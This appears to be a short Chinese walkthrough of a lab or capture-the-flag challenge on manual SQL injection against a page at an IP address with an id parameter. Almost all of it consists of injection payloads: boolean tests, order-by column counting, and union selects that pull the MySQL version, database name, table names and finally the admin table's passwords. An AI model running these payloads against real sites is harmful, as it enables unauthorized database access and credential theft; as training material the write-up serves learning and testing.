第一题URL为http://120.203.13.75:6815/?id=1
第一步进行手工注入and 1=1 正常显示文章内容 and 1 =2 不显示文章内容;
进行order by 进行查询字段 order by 10 不显示内容 用到我们了解到的二分之一方法 最后显示内容;
开始查询数据库版本 and 1=2 union select 1,version() 得到数据库版本5.5.53 ,百度MySQL5.5.53数据库爆出表名语句;
查询数据库名称and 1=2 union select 1,database() 得到名称maoshe ;
查询表名and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()
最后查询密码and 1=2 union select 1,password from admin;
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.